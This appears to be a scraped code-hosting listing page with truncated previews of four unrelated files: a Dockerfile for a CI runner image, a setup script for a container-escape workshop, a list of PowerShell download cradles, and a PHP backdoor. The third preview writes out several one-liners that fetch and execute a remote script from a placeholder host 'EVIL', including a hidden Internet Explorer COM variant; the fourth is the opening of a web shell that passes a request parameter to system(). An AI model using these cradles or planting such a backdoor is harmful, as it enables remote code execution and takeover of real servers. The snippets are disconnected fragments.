This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM cgr.dev/chainguard-private/dotnet-sdk:8-dev AS build | |
| # Arguments | |
| ARG TARGETPLATFORM | |
| ARG RUNNER_VERSION=2.328.0 | |
| ARG RUNNER_CONTAINER_HOOKS_VERSION=0.7.0 | |
| ARG DOTNET_VERSION=8 | |
| ARG NODE_VERSION=24 | |
| # Become root |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # This script sets up a new Ubuntu system for the container escapes workshop! | |
| # Set up the environment | |
| export DEBIAN_FRONTEND=noninteractive # disable interactive prompts | |
| set -e # exit on error | |
| # Test if the script is run as root | |
| if [ "$(id -u)" -ne 0 ]; then |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> | |
| <?php | |
| if(isset($_REQUEST['cmd'])){ | |
| echo "<pre>"; | |
| $cmd = ($_REQUEST['cmd']); | |
| system($cmd); | |
| echo "</pre>"; | |
| die; |